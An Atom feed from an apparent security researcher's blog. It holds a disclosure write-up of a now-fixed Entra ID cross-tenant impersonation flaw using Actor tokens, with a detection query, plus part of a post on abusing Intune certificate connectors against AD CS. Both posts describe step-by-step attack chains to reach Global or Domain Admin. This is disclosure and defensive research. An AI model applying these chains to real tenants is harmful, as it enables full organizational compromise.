<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="3.10.0">Jekyll</generator><link href="https://dirkjanm.io/feed.xml" rel="self" type="application/atom+xml" /><link href="https://dirkjanm.io/" rel="alternate" type="text/html" /><updated>2025-09-17T13:11:50+00:00</updated><id>https://dirkjanm.io/feed.xml</id><title type="html">dirkjanm.io</title><subtitle>Dirk-jan&apos;s personal blog, mostly containing research on topics I find interesting, such as (Azure) Active Directory internals, protocols and vulnerabilities.</subtitle><author><name>Dirk-jan Mollema</name></author><entry><title type="html">One Token to rule them all - obtaining Global Admin in every Entra ID tenant via Actor tokens</title><link href="https://dirkjanm.io/obtaining-global-admin-in-every-entra-id-tenant-with-actor-tokens/" rel="alternate" type="text/html" title="One Token to rule them all - obtaining Global Admin in every Entra ID tenant via Actor tokens" /><published>2025-09-17T13:00:57+00:00</published><updated>2025-09-17T13:00:57+00:00</updated><id>https://dirkjanm.io/obtaining-global-admin-in-every-entra-id-tenant-with-actor-tokens</id><content type="html" xml:base="https://dirkjanm.io/obtaining-global-admin-in-every-entra-id-tenant-with-actor-tokens/"><![CDATA[<p>While preparing for my Black Hat and DEF CON talks in July of this year, I found the most impactful Entra ID vulnerability that I will probably ever find. This vulnerability could have allowed me to compromise every Entra ID tenant in the world (except probably those in national cloud deployments<sup id="fnref:1" role="doc-noteref"><a href="#fn:1" class="footnote" rel="footnote">1</a></sup>). If you are an Entra ID admin reading this, yes that means complete access to your tenant. The vulnerability consisted of two components: undocumented impersonation tokens, called “Actor tokens”, that Microsoft uses in their backend for service-to-service (S2S) communication. Additionally, there was a critical flaw in the (legacy) Azure AD Graph API that failed to properly validate the originating tenant, allowing these tokens to be used for cross-tenant access.</p>

<p>Effectively this means that with a token I requested in my lab tenant I could authenticate as <em>any user</em>, including Global Admins, in <em>any other tenant</em>. Because of the nature of these Actor tokens, they are not subject to security policies like Conditional Access, which means there was no setting that could have mitigated this for specific hardened tenants. Since the Azure AD Graph API is an older API for managing the core Azure AD / Entra ID service, access to this API could have been used to make any modification in the tenant that Global Admins can do, including taking over or creating new identities and granting them any permission in the tenant. With these compromised identities the access could also be extended to Microsoft 365 and Azure.</p>

<p>I reported this vulnerability the same day to the Microsoft Security Response Center (MSRC). Microsoft fixed this vulnerability on their side within days of the report being submitted and has rolled out further mitigations that block applications from requesting these Actor tokens for the Azure AD Graph API. Microsoft also issued <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55241">CVE-2025-55241</a> for this vulnerability.</p>

<h1 id="impact">Impact</h1>
<p>These tokens allowed full access to the Azure AD Graph API in any tenant. Requesting Actor tokens does not generate logs. Even if it did they would be generated in my tenant instead of in the victim tenant, which means there is no record of the existence of these tokens.</p>

<p>Furthermore, the Azure AD Graph API does not have API level logging. Its successor, the Microsoft Graph, does have this logging, but for the Azure AD Graph this telemetry source is still in a very limited preview and I’m not aware of any tenant that currently has this available. Since there is no API level logging, it means the following Entra ID data could be accessed without any traces:</p>

<ul>
  <li>User information including all their personal details stored in Entra ID.</li>
  <li>Group and role information.</li>
  <li>Tenant settings and (Conditional Access) policies.</li>
  <li>Applications, Service Principals, and any application permission assignment.</li>
  <li>Device information and BitLocker keys synced to Entra ID.</li>
</ul>

<p>This information could be accessed by impersonating a regular user in the victim tenant. If you want to know the full impact, my tool <a href="https://github.com/dirkjanm/ROADtools">roadrecon</a> uses the same API, if you run it then everything you find in the GUI of the tool could have been accessed and modified by an attacker abusing this flaw.</p>

<p>If a Global Admin was impersonated, it would also be possible to <strong>modify</strong> any of the above objects and settings. This would result in full tenant compromise with access to any service that uses Entra ID for authentication, such as SharePoint Online and Exchange Online. It would also provide full access to any resource hosted in Azure, since these resources are controlled from the tenant level and Global Admins can grant themselves rights on Azure subscriptions. Modifying objects in the tenant does (usually) result in audit logs being generated. That means that while theoretically all data in Microsoft 365 could have been compromised, doing anything other than reading the directory information would leave audit logs that could alert defenders, though without knowledge of the specific artifacts that modifications with these Actor tokens generate, it would appear as if a legitimate Global Admin performed the actions.</p>

<p>Based on Microsoft’s internal telemetry, they did not detect any abuse of this vulnerability. If you want to search for possible abuse artifacts in your own environment, a KQL detection is included at the end of this post.</p>

<h1 id="technical-details">Technical details</h1>
<h2 id="actor-tokens">Actor tokens</h2>
<p>Actor tokens are tokens that are issued by the “Access Control Service”. I don’t know the exact origins of this service, but it appears to be a legacy service that is used for authentication with SharePoint applications and also seems to be used by Microsoft internally. I came across this service while investigating hybrid Exchange setups. These hybrid setups used to provision a certificate credential on the Exchange Online Service Principal (SP) in the tenant, with which it can perform authentication. These hybrid attacks were the topic of some talks I did this summer, the slides are on the <a href="/talks/">talks</a> page. In this case the hybrid part is not relevant, as in my lab I could also have added a credential on the Exchange Online SP without the complete hybrid setup. Exchange is not the only app which can do this, but since I found this in Exchange we will keep talking about these tokens in the context of Exchange.</p>

<p>Exchange will request Actor tokens when it wants to communicate with other services on behalf of a user. The Actor token allows it to “act” as another user in the tenant when talking to Exchange Online, SharePoint and as it turns out the Azure AD Graph. The Actor token (a JSON Web Token / JWT) looks as follows when decoded:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{
    "alg": "RS256",
    "kid": "_jNwjeSnvTTK8XEdr5QUPkBRLLo",
    "typ": "JWT",
    "x5t": "_jNwjeSnvTTK8XEdr5QUPkBRLLo"
}
{
    "aud": "00000002-0000-0000-c000-000000000000/graph.windows.net@6287f28f-4f7f-4322-9651-a8697d8fe1bc",
    "exp": 1752593816,
    "iat": 1752507116,
    "identityprovider": "00000001-0000-0000-c000-000000000000@6287f28f-4f7f-4322-9651-a8697d8fe1bc",
    "iss": "00000001-0000-0000-c000-000000000000@6287f28f-4f7f-4322-9651-a8697d8fe1bc",
    "nameid": "00000002-0000-0ff1-ce00-000000000000@6287f28f-4f7f-4322-9651-a8697d8fe1bc",
    "nbf": 1752507116,
    "oid": "a761cbb2-fbb6-4c80-aa50-504962316eb2",
    "rh": "1.AXQAj_KHYn9PIkOWUahpfY_hvAIAAAAAAAAAwAAAAAAAAACtAQB0AA.",
    "sub": "a761cbb2-fbb6-4c80-aa50-504962316eb2",
    "trustedfordelegation": "true",
    "xms_spcu": "true"
}.[signature from Entra ID]
</code></pre></div></div>

<p>There are a few fields here that differ from regular Entra ID access tokens:</p>

<ul>
  <li>The <code class="language-plaintext highlighter-rouge">aud</code> field contains the GUID of the Azure AD Graph API, as well as the URL <code class="language-plaintext highlighter-rouge">graph.windows.net</code> and the tenant it was issued to <code class="language-plaintext highlighter-rouge">6287f28f-4f7f-4322-9651-a8697d8fe1bc</code>.</li>
  <li>The expiry is exactly 24 hours after the token was issued.</li>
  <li>The <code class="language-plaintext highlighter-rouge">iss</code> contains the GUID of the Entra ID token service itself, called “Azure ESTS Service”, and again the tenant GUID where it was issued.</li>
  <li>The token contains the claim <code class="language-plaintext highlighter-rouge">trustedfordelegation</code>, which is <code class="language-plaintext highlighter-rouge">True</code> in this case, meaning we can use this token to impersonate other identities. Many Microsoft apps could request such tokens. Non-Microsoft apps requesting an Actor token would receive a token with this field set to <code class="language-plaintext highlighter-rouge">False</code> instead.</li>
</ul>

<p>When using this Actor token, Exchange would embed this in an <strong>unsigned</strong> JWT that is then sent to the resource provider, in this case the Azure AD graph. In the rest of the blog I call these <strong>impersonation tokens</strong> since they are used to impersonate users.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{
    "alg": "none",
    "typ": "JWT"
}
{
    "actortoken": "eyJ0eXAiOiJKV1Qi&lt;snip&gt;TxeLkNB8v2rWWMLGpaAaFJlhA",
    "aud": "00000002-0000-0000-c000-000000000000/graph.windows.net@6287f28f-4f7f-4322-9651-a8697d8fe1bc",
    "exp": 1756926566,
    "iat": 1756926266,
    "iss": "00000002-0000-0ff1-ce00-000000000000@6287f28f-4f7f-4322-9651-a8697d8fe1bc",
    "nameid": "10032001E2CBE43B",
    "nbf": 1756926266,
    "nii": "urn:federation:MicrosoftOnline",
    "sip": "doesnt@matter.com",
    "smtp": "doesnt@matter.com",
    "upn": "doesnt@matter.com"
}.[no signature]
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">sip</code>, <code class="language-plaintext highlighter-rouge">smtp</code>, <code class="language-plaintext highlighter-rouge">upn</code> fields are used when accessing resources in Exchange online or SharePoint, but are ignored when talking to the Azure AD Graph, which only cares about the <code class="language-plaintext highlighter-rouge">nameid</code>. This <code class="language-plaintext highlighter-rouge">nameid</code> originates from an attribute of the user that is called the <code class="language-plaintext highlighter-rouge">netId</code> on the Azure AD Graph. You will also see it reflected in tokens issued to users, in the <code class="language-plaintext highlighter-rouge">puid</code> claim, which stands for Passport UID. I believe these identifiers are an artifact from the original codebase which Microsoft used for its Microsoft Accounts (consumer accounts or MSA). They are still used in Entra ID, for example to map guest users to the original identity in their home tenant.</p>

<p>As I mentioned before, these impersonation tokens are not signed. That means that once Exchange has an Actor token, it can use the one Actor token to impersonate anyone against the target service it was requested for, for 24 hours. In my personal opinion, this whole Actor token design is something that never should have existed. It lacks almost every security control that you would want:</p>

<ul>
  <li>There are no logs when Actor tokens are issued.</li>
  <li>Since these services can craft the unsigned impersonation tokens without talking to Entra ID, there are also no logs when they are created or used.</li>
  <li>They cannot be revoked within their 24 hours validity.</li>
  <li>They completely bypass any restrictions configured in Conditional Access.</li>
  <li>We have to rely on logging from the resource provider to even know these tokens were used in the tenant.</li>
</ul>

<p>Microsoft uses these tokens to talk to other services in their backend, something that Microsoft calls service-to-service (S2S) communication. If one of these tokens leaks, it can be used to access all the data in an entire tenant without any useful telemetry or mitigation. In July of this year, Microsoft did publish <a href="https://www.microsoft.com/en-us/security/blog/2025/07/08/enhancing-microsoft-365-security-by-eliminating-high-privilege-access/">a blog</a> about removing these insecure legacy practices from their environment, but they do not provide any transparency about how many services still use these tokens.</p>

<h2 id="the-fatal-flaw-leading-to-cross-tenant-compromise">The fatal flaw leading to cross-tenant compromise</h2>
<p>As I was refining my slide deck and polished up my proof-of-concept code for requesting and generating these tokens, I tested more variants of using these tokens, changing various fields to see if the tokens still worked with the modified information. As one of the tests I changed the tenant ID of the impersonation token to a different tenant in which none of my test accounts existed. The Actor tokens tenant ID was my <code class="language-plaintext highlighter-rouge">iminyour.cloud</code> tenant, with tenant ID <code class="language-plaintext highlighter-rouge">6287f28f-4f7f-4322-9651-a8697d8fe1bc</code> and the unsigned JWT generated had the tenant ID <code class="language-plaintext highlighter-rouge">b9fb93c1-c0c8-4580-99f3-d1b540cada32</code>.</p>

<p><img src="/assets/img/actortokens/tenantchange.png" alt="Changed tenant ID" /></p>

<p>I sent this token to <code class="language-plaintext highlighter-rouge">graph.windows.net</code> using my CLI tool <code class="language-plaintext highlighter-rouge">roadtx</code>, expecting a generic access denied since I had a tenant ID mismatch. However, I was instead greeted by a curious error message:</p>

<p><img src="/assets/img/actortokens/usernotfound.png" alt="Error message indicating the user does not exist" /></p>

<p><em>Note that these are the actual screenshots I made during my research, which is why the formatting may not work as well in this blog</em></p>

<p>The error message suggested that while my token was valid, the identity could not be found in the tenant. Somehow the API seemed to accept my token even with the mismatching tenant. I quickly looked up the <code class="language-plaintext highlighter-rouge">netId</code> of a user that did exist in the target tenant, crafted a token and the Azure AD Graph happily returned the data I requested. I tested this in a few more test tenants I had access to, to make sure I was not crazy, but I could indeed access data in other tenants, as long as I knew their tenant ID (which is public information) and the <code class="language-plaintext highlighter-rouge">netId</code> of a user in that tenant.</p>

<p>To demonstrate the vulnerability, here I am using a Guest user in the target tenant to query the <code class="language-plaintext highlighter-rouge">netId</code> of a Global Admin. Then I impersonate the Global Admin using the same Actor token, and can perform any action in the tenant as that Global Admin over the Azure AD Graph.</p>

<p>First I craft an impersonation token for a Guest user in my victim tenant:</p>

<p><img src="/assets/img/actortokens/guesttoken.png" alt="Craft impersonation token for Guest user" /></p>

<p>I use this token to query the <code class="language-plaintext highlighter-rouge">netId</code> of a Global Admin:</p>

<p><img src="/assets/img/actortokens/findga.png" alt="Query Global Admin" /></p>

<p>Then I create an impersonation token for this Global Admin (the UPN is kept the same since it is not validated by the API):</p>

<p><img src="/assets/img/actortokens/gaimpersonate.png" alt="Craft impersonation token for Global Admin" /></p>

<p>And finally this token is used to access the tenant as the Global Admin, listing the users, something the guest user was not able to do:</p>

<p><img src="/assets/img/actortokens/queryusers.png" alt="Query data in the tenant" /></p>

<p>I can even run roadrecon with this impersonation token, which queries all Azure AD Graph API endpoints to enumerate the available information in the tenant.</p>

<p><img src="/assets/img/actortokens/runroadrecon.png" alt="Running roadrecon in a tenant with an impersonation token" /></p>

<p>None of these actions would generate any logs in the victim tenant.</p>

<h1 id="practical-abuse">Practical abuse</h1>
<p>With this vulnerability it would be possible to compromise any Entra ID tenant. Starting with an Actor token from an attacker controlled tenant, the following steps would lead to full control over the victim tenant:</p>

<ol>
  <li>Find the tenant ID for the victim tenant, this can be done using public APIs based on the domain name.</li>
  <li>Find a valid <code class="language-plaintext highlighter-rouge">netId</code> of a regular user in the tenant. Methods for this will be discussed below.</li>
  <li>Craft an impersonation token with the Actor token from the attacker tenant, using the tenant ID and <code class="language-plaintext highlighter-rouge">netId</code> of the user in the victim tenant.</li>
  <li>List all Global Admins in the tenant and their <code class="language-plaintext highlighter-rouge">netId</code>.</li>
  <li>Craft an impersonation token for the Global Admin account.</li>
  <li>Perform any read or write action over the Azure AD Graph API.</li>
</ol>

<p>If an attacker makes any modifications in the tenant in step 6, that would be the only event in this chain that generates any telemetry in the victim tenant. An attacker could for example create new user accounts, grant these Global Admin privileges and then sign in interactively to any Entra ID, Microsoft 365 or third party application that integrates with the victim tenant. Alternatively they could add credentials on existing applications, grant these apps API permissions and use that to exfiltrate emails or files from Microsoft 365, a technique that is popular among threat actors. An attacker could also add credentials to <a href="https://dirkjanm.io/azure-ad-privilege-escalation-application-admin/">Microsoft Service Principals</a> in the victim tenant, several of which can request Actor tokens that allow impersonation against SharePoint or Exchange. For my DEF CON and Black Hat talks I made a demo video about using these Actor tokens to obtain Global Admin access. The video uses Actor tokens within a tenant, but the same technique could have been applied to any other tenant by abusing this vulnerability.</p>

<video width="100%" controls="">
  <source src="/assets/raw/demo_graph.mp4" type="video/mp4" />
</video>

<h2 id="finding-netids">Finding netIds</h2>
<p>Since tenant IDs can be resolved when the domain name of a tenant is known, the only identifier that is not immediately available to the attacker is a valid <code class="language-plaintext highlighter-rouge">netId</code> for a user in that specific tenant. As I mentioned above, these IDs are added to Entra ID access tokens as the <code class="language-plaintext highlighter-rouge">puid</code> claim. Any token found online, in screenshots, examples or logs, even those that are long expired or with an obfuscated signature, would provide an attacker with enough information to breach the tenant. Threat actors that still have old tokens for any tenant from previous breaches can immediately access those tenants again as long as the victim account still exists.</p>

<p>The above is probably not a very common occurrence. What is a more realistic attack is simply brute-forcing the <code class="language-plaintext highlighter-rouge">netId</code>. Unlike object IDs, which are randomly generated, netIds are actually incremental. Looking at the differences in netIds between my tenant and those of some tenants I analyzed, I found the difference between a newly created user in my tenant and their newest user to be in the range of 100.000 to 100 million. Simply brute forcing the <code class="language-plaintext highlighter-rouge">netId</code> could be accomplished in minutes to hours for any target tenant, and the more user exist in a tenant the easier it is to find a match. Since this does not generate any logs it isn’t a noisy attack either. Because of the possibility to brute force these netIds I would say this vulnerability could have been used to take over any tenant without any prerequisites. There is however a third technique which is even more effective (and more fun from a technical level).</p>

<h2 id="compromising-tenants-by-hopping-over-b2b-trusts">Compromising tenants by hopping over B2B trusts</h2>
<p>I previously mentioned that a users <code class="language-plaintext highlighter-rouge">netId</code> is used to establish links between a user account in multiple tenants. This is something that I researched a few years ago when I gave a talk at <a href="/assets/raw/US-22-Mollema-Backdooring-and-hijacking-Azure-AD-accounts_final.pdf">Black Hat USA 22</a> about external identities. The below screenshot is taken from one of my slides, which illustrates this:</p>

<p><img src="/assets/img/actortokens/guestlink.png" alt="Guest user link based on netid" /></p>

<p>The way this works is as follows. Suppose we have tenant A and tenant B. A user in tenant B is invited into tenant A. In the new guest account that is created in tenant A, their <code class="language-plaintext highlighter-rouge">netId</code> is stored on the <code class="language-plaintext highlighter-rouge">alternativeSecurityIds</code> attribute. That means that an attacker wanting to abuse this bug can simply read that attribute in tenant A, put it in an impersonation token for tenant B and then impersonate the victim in their home tenant. It should be noted that this works <strong>against the direction of invite</strong>. Any user in any tenant where you accept an invite will be able to read your <code class="language-plaintext highlighter-rouge">netId</code>, and with this bug could have impersonated you in your home tenant. In your home tenant you have a full user account, which can enumerate other users. This is not a bug or risk with B2B trusts, but is simply an unintended consequence of the B2B design mechanism. A guest account in someone else’s tenant would also be sufficient with the default Entra ID guest settings because the default settings allow users to query the <code class="language-plaintext highlighter-rouge">netId</code> of a user as long as the UPN is known.</p>

<p>To abuse this, a threat actor could perform the following steps, given that they have access to at least one tenant with a guest user:</p>

<ol>
  <li>Query the guest users and their <code class="language-plaintext highlighter-rouge">alternativeSecurityIds</code> attribute which gives the <code class="language-plaintext highlighter-rouge">netId</code>.</li>
  <li>Query the tenant ID of the guest users home tenant based on the domain name in their UPN.</li>
  <li>Create an impersonation token, impersonating the victim in their home tenant.</li>
  <li>Optionally list Global Admins and impersonate those to compromise the entire tenant.</li>
  <li>Repeat step 1 for each tenant that was compromised.</li>
</ol>

<p>The steps above can be done in 2 API calls per tenant, which do not generate any logs. Most tenants will have guest users from multiple distinct other tenants. This means the number of tenants you compromise with this scales exponentially and the information needed to compromise the majority of all tenants worldwide could have been gathered within minutes using a single Actor token. After at least 1 user is known per victim tenant, the attacker can selectively perform post-compromise actions in these tenants by impersonating Global Admins.</p>

<p>Looking at the list of guest users in the tenants of some of my clients, this technique would be extremely powerful. I also observed that one of the first tenants you will likely compromise is Microsoft’s own tenant, since Microsoft consultants often get invited to customer tenants. Many MSPs and Microsoft Partners will have a guest account in the Microsoft tenant, so from the Microsoft tenant a compromise of most major service provider tenants is one step away.</p>

<p>Needless to say, as much as I would have liked to test this technique in practice to see how fast this would spread out, I only tested the individual steps in my own tenants and did not access any data I’m not authorized to.</p>

<h1 id="detection">Detection</h1>
<p>While querying data over the Azure AD Graph does not leave any logs, modifying data does (usually) generate audit logs. If modifications are done with Actor tokens, these logs look a bit curious.</p>

<p><img src="/assets/img/actortokens/initiatedby.png" alt="Initiated by exchange and a global admin" class="align-center" width="60%" /></p>

<p>Since Actor tokens involve both the app and the user being impersonated, it seems Entra ID gets confused about who actually made the change, and it will log the UPN of the impersonated Global Admin, but the display name of Exchange. Luckily for defenders this creates a nice giveaway when Actor tokens are used in the tenant. After some testing and filtering with some fellow researchers that work on the blue side (thanks to Fabian Bader and Olaf Hartong) we came up with the following detection query:</p>

<pre><code class="language-kql">AuditLogs
| where not(OperationName has "group")
| where not(OperationName == "Set directory feature on tenant")
| where InitiatedBy has "user"
| where InitiatedBy.user.displayName has_any ( "Office 365 Exchange Online", "Skype for Business Online", "Dataverse", "Office 365 SharePoint Online", "Microsoft Dynamics ERP")
</code></pre>

<p>The exclusion for group operations is there because some of these products do actually use Actor tokens to perform operations on your behalf. For example creating specific groups via the Exchange Online PowerShell module will make Exchange use an Actor token on your behalf and create the group in Entra ID.</p>

<h1 id="conclusion">Conclusion</h1>
<p>This blog discussed a critical token validation failure in the Azure AD Graph API. While the vulnerability itself was a bad oversight in the token handling, the whole concept of Actor tokens is a protocol that was designed to behave with all the properties mentioned in the paragraphs above. If it weren’t for the complete lack of security measures in these tokens, I don’t think such a big impact with such limited telemetry would have been possible.</p>

<p>Thanks to the people at MSRC who immediately picked up the vulnerability report, searched for potential variants in other resources, and to the engineers who followed up with fixes for the Azure AD Graph and blocked Actor tokens for the Azure AD Graph API requested with credentials stored on Service Principals, essentially restricting the usage of these Actor tokens to only Microsoft internal services.</p>

<h2 id="disclosure-timeline">Disclosure timeline</h2>

<ul>
  <li>July 14, 2025 - reported issue to MSRC.</li>
  <li>July 14, 2025 - MSRC case opened.</li>
  <li>July 15, 2025 - reported further details on the impact.</li>
  <li>July 15, 2025 - MSRC requested to halt further testing of this vulnerability.</li>
  <li>July 17, 2025 - Microsoft pushed a fix for the issue globally into production.</li>
  <li>July 23, 2025 - Issue confirmed as resolved by MSRC.</li>
  <li>August 6, 2025 - Further mitigations pushed out preventing Actor tokens being issued for the Azure AD Graph with SP credentials.</li>
  <li>September 4, 2025 - <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55241">CVE-2025-55241</a> issued.</li>
  <li>September 17, 2025 - Release of this blogpost.</li>
</ul>

<div class="footnotes" role="doc-endnotes">
  <ol>
    <li id="fn:1" role="doc-endnote">
      <p>I do not have access to any tenants in a national cloud deployment, so I was not able to test whether the vulnerability existed there. Since national cloud deployments use their own token signing keys, it is unlikely that it would have been possible to execute this attack from a tenant in the public cloud to one of these national clouds. I do consider it likely that this attack would have worked across tenants in the same national cloud deployments, but that is speculation. <a href="#fnref:1" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
  </ol>
</div>]]></content><author><name>Dirk-jan Mollema</name></author><summary type="html"><![CDATA[While preparing for my Black Hat and DEF CON talks in July of this year, I found the most impactful Entra ID vulnerability that I will probably ever find. One that could have allowed me to compromise every Entra ID tenant in the world (except probably those in national cloud deployments). If you are an Entra ID admin reading this, yes that means complete access to your tenant. The vulnerability consisted of two components: undocumented impersonation tokens that Microsoft uses in their backend for service-to-service (S2S) communication, called "Actor tokens", and a critical vulnerability in the (legacy) Azure AD Graph API that did not properly validate the originating tenant, allowing these tokens to be used for cross-tenant access.]]></summary></entry><entry><title type="html">Extending AD CS attack surface to the cloud with Intune certificates</title><link href="https://dirkjanm.io/extending-ad-cs-attack-surface-intune-certs/" rel="alternate" type="text/html" title="Extending AD CS attack surface to the cloud with Intune certificates" /><published>2025-07-30T14:00:57+00:00</published><updated>2025-07-30T14:00:57+00:00</updated><id>https://dirkjanm.io/extending-ad-cs-attack-surface-intune-certs</id><content type="html" xml:base="https://dirkjanm.io/extending-ad-cs-attack-surface-intune-certs/"><![CDATA[<p>Active Directory Certificate Services (AD CS) attack surface is pretty well explored in Active Directory itself, with <em>*checks notes*</em> already 16 “ESC” attacks being publicly described. Hybrid certificate attack paths have not gained that much attention yet, though I have come across several hybrid integrations while reviewing cloud configurations. In these setups, certificates are rolled out to cloud-managed endpoints via Microsoft Intune and the Intune certificate connector. The certificate connector runs in on-premises AD and requests the certificates on AD CS via the SCEP or PKCS integrations. In such environments, it would be possible to request certificates with arbitrary subjects as an Intune administrator. What I have also observed in some cases are certificate configurations in Intune being misconfigured in a way that would allow <strong>regular users</strong> to perform the same attack and effectively perform ESC1 over Intune certificates. That means going from regular user and their endpoint to Domain Admin in AD, all from the cloud. This blog explores the scenarios where this is possible and provides exploitation and remediation guidance.</p>

<h2 id="the-setup">The setup</h2>
<p>Intune supports a “Certificate Connector” that can be installed on-prem, to allow Intune to request certificates in AD CS. The certificate connector is <a href="https://learn.microsoft.com/en-us/intune/intune-service/protect/certificate-connector-overview">documented here</a> and provides 3 options for distributing certificates:</p>

<ul>
  <li><strong>PKCS</strong>, which requests the certificates in AD CS using an Intune generated private key, and pushes the certificate plus the key to the device.</li>
  <li><strong>SCEP</strong>, in which case the device requests the certificate over the Simple Certificate Enrollment Protocol using an Intune provided “challenge”. The SCEP endpoint is usually internet exposed through a proxy.</li>
  <li><strong>PFX import</strong>, which distributes administrator uploaded PFX certificates to devices (not covered in this blog).</li>
</ul>

<p>The certificate connector is usually installed on a standalone server in AD, and in case of the SCEP protocol will also need the Network Device Enrollment Service (NDES) server role (part of AD CS). In addition, both of these configuration options require an AD CS certificate template that allows user supplied SANs. On the AD side, such a template would look as follows (output from Certipy):</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>  1
    Template Name                       : NDES-Computer
    Display Name                        : NDES-Computer
    Certificate Authorities             : hybrid-HYBRID-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Extended Key Usage                  : Server Authentication
                                          Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 4
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-05-22T14:09:06+00:00
    Template Last Modified              : 2025-05-22T14:10:00+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : HYBRID.IMINYOUR.CLOUD\svc_ndes
                                          HYBRID.IMINYOUR.CLOUD\Domain Admins
                                          HYBRID.IMINYOUR.CLOUD\Enterprise Admins
</code></pre></div></div>

<p>The following details are important for this attack:</p>
<ul>
  <li>The template is from a CA that is in the <code class="language-plaintext highlighter-rouge">NTAuthCertificates</code> object in AD.</li>
  <li>The <code class="language-plaintext highlighter-rouge">EnrolleeSuppliesSubject</code> flag is set, this is a requirement for Intune to be able to issue certificates for other users/devices, meaning that this flag should always be set for Intune templates.</li>
  <li>The certificate allows for client authentication. As client authentication is one of the major use cases for these certs I can’t imagine many cases in which this will not be configured.</li>
  <li>A service account hosting the NDES server role or the host on which the certificate connector is running is authorized to enroll in the cert template. For SCEP it is common to use a separate service account, for PKCS I think it defaults to the computer account of the server. If “Domain Users” can enroll then you already have ESC1 and there isn’t much need for the rest of this blog as long as you have network connectivity to the CA.</li>
</ul>

<h2 id="scep-vs-pkcs">SCEP vs PKCS</h2>
<p>While the Intune Certificate connector supports both protocols, companies are likely to use either one or the other. Architecture wise they are quite different, so let’s take a high-level look at how both operate:</p>

<h3 id="pkcs">PKCS</h3>
<p>PKCS performs most of the operations between Intune and the device. The flow is as follows:</p>

<ul>
  <li>Intune will generate a Certificate Sign Request (CSR) and private key within the Intune service.</li>
  <li>When the Certificate Connector checks in it will download the CSR and try to request the certificate with AD CS.</li>
  <li>It then uploads the issued certificate to Intune.</li>
  <li>The issued certificate with the Intune generated private key is pushed to the device.</li>
</ul>

<p>In a diagram, that looks as follows:</p>

<p><img src="/assets/img/intune/01-intune-pkcs.png" alt="Intune PKCS flow diagram" class="align-center" /></p>

<p>The important details here are:</p>
<ul>
  <li>The private key is generated by Intune, not by the device. Theoretically Intune also possesses the private key while it hasn’t yet been provisioned to the end-user device.</li>
  <li>The device only communicates with Intune, not with any AD asset directly.</li>
  <li>It can be used to enroll in any template that the connector service has access to, since this is supplied in the certificate configuration.</li>
</ul>

<h3 id="scep">SCEP</h3>
<p>With SCEP, the flow is different:</p>

<ul>
  <li>Intune generates an encrypted and signed “challenge blob” and send this with the certificate details to the device.</li>
  <li>The device generates a private key locally and uses SCEP to talk to the NDES server, requesting a certificate based on a CSR and the challenge.</li>
  <li>The certificate connector validates the challenge and CSR by sending them to Intune. Intune performs various checks to confirm that the subject, SANs, EKUs etc matches with the certificate profile, and that the challenge isn’t expired.</li>
  <li>If the validation succeeds, the certificate connector sends the CSR to the CA and it will issue the certificate.</li>
  <li>The signed certificate is returned in the SCEP response to the device.</li>
</ul>

<p>Again a diagram of this flow:</p>

<p><img src="/assets/img/intune/02-intune-scep.png" alt="Intune SCEP flow diagram" class="align-center" /></p>

<p>A few notable points:</p>

<ul>
  <li>In this case the private key never leaves the end device.</li>
  <li>The device does communicate with AD, usually over something like an application proxy.</li>
  <li>The device generates the CSR so it could request a completely different cert, however the NDES server validates the request by sending the CSR to Intune.</li>
  <li>The enrollment template is fixed because it is configured in the registry on the NDES server.</li>
</ul>

<h2 id="issuing-ad-cs-certificates-with-arbitrary-subjects-as-an-intune-administrator-or-global-administrator">Issuing AD CS certificates with arbitrary subjects as an Intune Administrator or Global Administrator</h2>
<p>It should be no surprise that if such a setup is present, it can be abused by attackers if they have a privileged role in the tenant. After all, the AD CS template allows any subject, the Certificate Connector or NDES server can enroll these templates, so with the correct configuration we can impersonate a Domain Admin or a domain controller. There are three main challenges with this:</p>

<ol>
  <li>Configuring the template so that <a href="https://techcommunity.microsoft.com/blog/intunecustomersuccess/support-tip-implementing-strong-mapping-in-microsoft-intune-certificates/4053376">strong mapping requirements</a> are met and AD will accept the certificate for our user.</li>
  <li>Getting the certificate delivered to an endpoint under the attackers control and using it to request a TGT for further exploitation.</li>
  <li>Having network access to talk to on-prem Domain Controllers. This is out of scope for the blog post, I’m assuming you already have at least network access in AD. While somewhat uncommon, it could be the case that companies also roll out their VPN configurations via Intune which usually use the same or a similar device certificate for authentication. As an Intune admin you could also roll out your favorite C2 implant binary to any Intune managed endpoint and get access to the on-prem network that way.</li>
</ol>

<p>Let’s look at the Intune part first. Consider an example certificate profile here:</p>

<p><img src="/assets/img/intune/03-intune-pkcs-profile.png" alt="Intune PKCS configuration profile" class="align-center" /></p>

<p>This is a device certificate, which is why it uses the DNS Subject Alternative Name (SAN) for mapping it to a specific device. User certificates would usually use the UPN instead of the DNS name. The Intune “Certificate type” is a device certificate in this case, which means it will be saved as a computer certificate on the endpoint if the Entra ID device object is in scope of the configuration profile. For user certificates, they are stored as a user certificate on the endpoint, and will be issued to users in scope of the configuration profile.</p>

<p>Both user or device certificate can be used to impersonate user or computer accounts in AD, since the mapping is done based on the SAN and the AD CS template will allow both objects. Whether to target a user or device in AD is up to you, in this example the goal will be to impersonate a Domain Controller, so I will pick a computer as a target and use a DNS SAN.</p>

<p>We will create a new configuration profile rather than modifying an existing one, to prevent the change from being rolled out to actual endpoints. This also makes sure the certificate will be provisioned immediately, since I don’t know how fast Intune picks up on “changed” certificate configurations, if at all, once a certificate is already issued.</p>

